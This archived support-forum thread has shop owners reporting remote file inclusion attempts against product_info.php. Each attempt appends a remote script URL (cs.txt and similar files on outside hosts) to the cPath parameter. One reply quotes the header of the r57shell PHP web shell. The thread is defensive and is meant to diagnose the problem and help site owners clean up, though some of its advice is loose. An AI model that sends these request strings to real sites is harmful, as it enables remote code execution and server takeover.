Latest News: (loading..)

Archived

This topic is now archived and is closed to further replies.

rkoechel2004

Strange Site showing up in who's online..

8 posts in this topic

The last couple days I've noticed in my who's online page that there is the following site showing up sometimes. Any idea what this is or why its happening?

 

/product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?

 

Thanks

Ryan

Share this post


Link to post
Share on other sites
The last couple days I've noticed in my who's online page that there is the following site showing up sometimes. Any idea what this is or why its happening?

 

/product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?

 

Thanks

Ryan

 

 

I'm also getting this url appended to the cPath: http://rumusic.chat.ru/rumusic.wav?

Share this post


Link to post
Share on other sites
I got the follow one:

http://amygirl.chat.ru/images/image.txt?

http://ninaru.hut2.ru/images/cs.txt?

http://amyru.h18.ru/images/cs.txt?

etc

 

Is it a hacking attempt?

 

We are using 6.15, is our site safe?

 

Any help is appreciated, thanks!

 

David

anybeads.com

 

I saw this one today: http://kiopmanminsuion.chat.ru/http?

 

Does anyone have an idea where this is coming from?

Share this post


Link to post
Share on other sites

Hello rkoechel2004,

what you are seeing is an injection code in your site.

 

Injection is when some hackers inject this type of info in a site that the server is not secure.

 

In my servers I see this type of attacks every minute, but we do a really good job blocking them. I will sugest that you ask your hosting provider to install a really good firewall system as it seems it lacks of this.

 

The worst is that if they have managed to install this injection, they could install a sombie script as well.

Share this post


Link to post
Share on other sites
The last couple days I've noticed in my who's online page that there is the following site showing up sometimes. Any idea what this is or why its happening?

 

/product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?

 

Thanks

Ryan

I'm seeing the same thing. Check out this thread: http://forums.creloaded.com/Forums/viewtopic/p=91071.html

Share this post


Link to post
Share on other sites
I'm seeing the same thing. Check out this thread: http://forums.creloaded.com/Forums/viewtopic/p=91071.html

 

Check Your site for this file dir.php

This is what he downloads!

<?php

/********************************************************************************

**********************/

/*

/* # # # # # #

/* # # # # # #

/* # # # # # #

/* # # ## #### ## # #

/* # # ## ## # # ## ## # #

/* # # ## ## # # ## ## # #

/* # #### ## # # ## #### #

/* # ### ############ ### #

/* # ########## ########## #

/* # ###### ###### #

/* # ######## ## #### ## ####### #

/* # ### ## #### #### ## ### #

/* # ### ## ## ## ## ## ### #

/* # ### # ## #### ## # ### #

/* # ### ## ## ## ## ## ### #

/* # ## # ## ## # ## #

/* # ## # #### # ## #

/* # ## ## #

/*

/*

/*

/* r57shell.php - ñêðèïò íà ïõï ïîçjâîëÿþùèé âàì âûïîëíÿòü ñèñòåìíûå êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð

/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru

/* Âåðñèÿ: 1.3 (05.03.2006)

 

This for some reason does not display right - it's a picture of a Spider

 

This hacker is hitting all PHP apps looking for security holes.

If you don't have the latest version which I assume blocks this type of hacker attack then you may have been hacked.

 

Firewalls do not stop this type of attack since it's a Software security problem.

Firewalls prevent Port access and not software execution.

The newest version of PHP is helpful in preventing this type of thing.

Modsecurity which is installed on a server is very good at stopping many such types of attacks but rules need to be added to keep up with the newest attack method.

The way the hacker gets in is by passing the text file to your server - cs.txt

This happens due to poor coding methods that do not prevent this type of thing.

When a URL of this type is passed the app accepts it and the server copies the cs.txt file to the tmp directory.

He then may download other files to your server by this same manner.

 

Again if you suspect you have been hacked then look around for files that do not belong to you.

Share this post


Link to post
Share on other sites